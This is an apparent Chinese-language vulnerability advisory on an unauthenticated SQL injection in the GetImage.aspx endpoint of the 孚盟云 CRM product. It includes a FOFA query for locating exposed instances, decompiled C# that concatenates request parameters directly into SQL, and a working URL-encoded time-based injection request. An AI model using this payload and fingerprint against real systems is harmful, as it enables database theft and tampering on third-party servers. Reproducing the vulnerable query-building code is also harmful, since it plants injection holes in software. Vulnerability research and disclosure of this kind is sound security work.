漏洞简介
上海孚盟软件有限公司是一家专业的外贸SaaS服务和行业解决方案提供商。其旗下产品孚盟云GetImage.aspx接口存在 SQL注入漏洞。攻击者可在无需认证的情况下,通过构造恶意请求参数注入恶意 SQL 语句,导致数据库信息泄露、数据篡改甚至系统权限提升,影响系统数据安全和完整性。
影响版本
fofa语法
app="孚盟软件-孚盟云"
漏洞分析
直接看 Common/GetImage.aspx 对应的dll文件 FumaCRM_BS.NewWeb.dll 里有关 GetImage 方法的实现如下
public class GetImage : Page
{
private DbHelperSql dbHelper = new DbHelperSql(UserCookie.GetCookieValue("corpId"));
protected HtmlForm form1;
protected void Page_Load(object sender, EventArgs e)
{
try
{
string str1 = this.Request.QueryString["MouldID"];
string str2 = this.Request.QueryString["pkField"];
string str3 = this.Request.QueryString["Field"];
string str4 = Base64.base64Decode(this.Request.QueryString[str2]);
string str5 = this.Request.QueryString["SqlNo"];
if (string.IsNullOrEmpty(str5))
str5 = "1";
string str6 = this.dbHelper.Query($"select TableName from syMouldTables where MouldID='{str1}' and SqlNo={str5} and IsUpdate=1").Tables[0].Rows[0][0].ToString();
byte[] numArray = this.dbHelper.Query($"select {str3} from {str6} where {str2}={str4}").Tables[0].Rows[0][0] as byte[];
MemoryStream memoryStream = new MemoryStream(numArray);
this.Response.Clear();
this.Response.ContentType = "image/gif";
this.Response.OutputStream.Write(numArray, 0, numArray.Length);
this.Response.End();
未经过滤或参数化绑定的参数 MouldID 被直接拼接进SQL语句中进行执行,造成SQL注入漏洞。
漏洞复现
GET /Common/GetImage.aspx?MouldID=%2d%31%27%57%41%49%54%46%4f%52%20%44%45%4c%41%59%27%30%3a%30%3a%35%27%2d%2d HTTP/1.1
Host: fumacrm.mrxn.net

成功延时 5 秒

